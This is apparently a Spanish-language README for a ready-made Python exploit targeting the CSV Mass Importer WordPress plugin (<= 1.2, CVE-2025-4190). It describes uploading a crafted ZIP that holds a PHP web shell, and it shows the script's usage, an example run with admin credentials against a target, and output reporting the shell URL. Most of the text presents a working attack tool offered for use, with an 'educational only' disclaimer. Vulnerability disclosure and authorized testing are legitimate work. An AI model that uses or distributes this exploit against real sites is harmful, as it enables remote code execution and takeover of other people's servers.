
CSV Mass Importer <= 1.2 - Carga arbitraria de archivos (Admin+)
El plugin CSV Mass Importer (≤ 1.2) para WordPress contiene una vulnerabilidad de Carga Arbitraria de Archivos para Admin+.
Debido a una validación incorrecta de los archivos subidos, los usuarios con altos privilegios (como administradores) pueden subir archivos arbitrarios al servidor, incluso cuando esto debería estar restringido — por ejemplo en configuraciones multisitio.
Esta vulnerabilidad permite a un atacante subir shells PHP o archivos maliciosos, lo que conduce a la ejecución remota de código (RCE) en el servidor.
Descubierto por Nxploited (Khaled Alenazi).
El plugin no verifica adecuadamente los archivos subidos al utilizar la función de importación CSV.
Se puede subir un archivo ZIP manipulado que contenga un shell PHP y extraerlo a un directorio de acceso público.
Ejemplo de Ruta del Shell:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
Este repositorio contiene un script de exploit Python listo: 4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
Este código se proporciona únicamente con fines educativos.
El autor no se responsabiliza por cualquier uso indebido o daño causado por este script.
Úsalo de manera responsable y solo en sistemas que estés autorizado a probar.
Descubierto y desarrollado por Khaled Alenazi (Nxploited) 🌟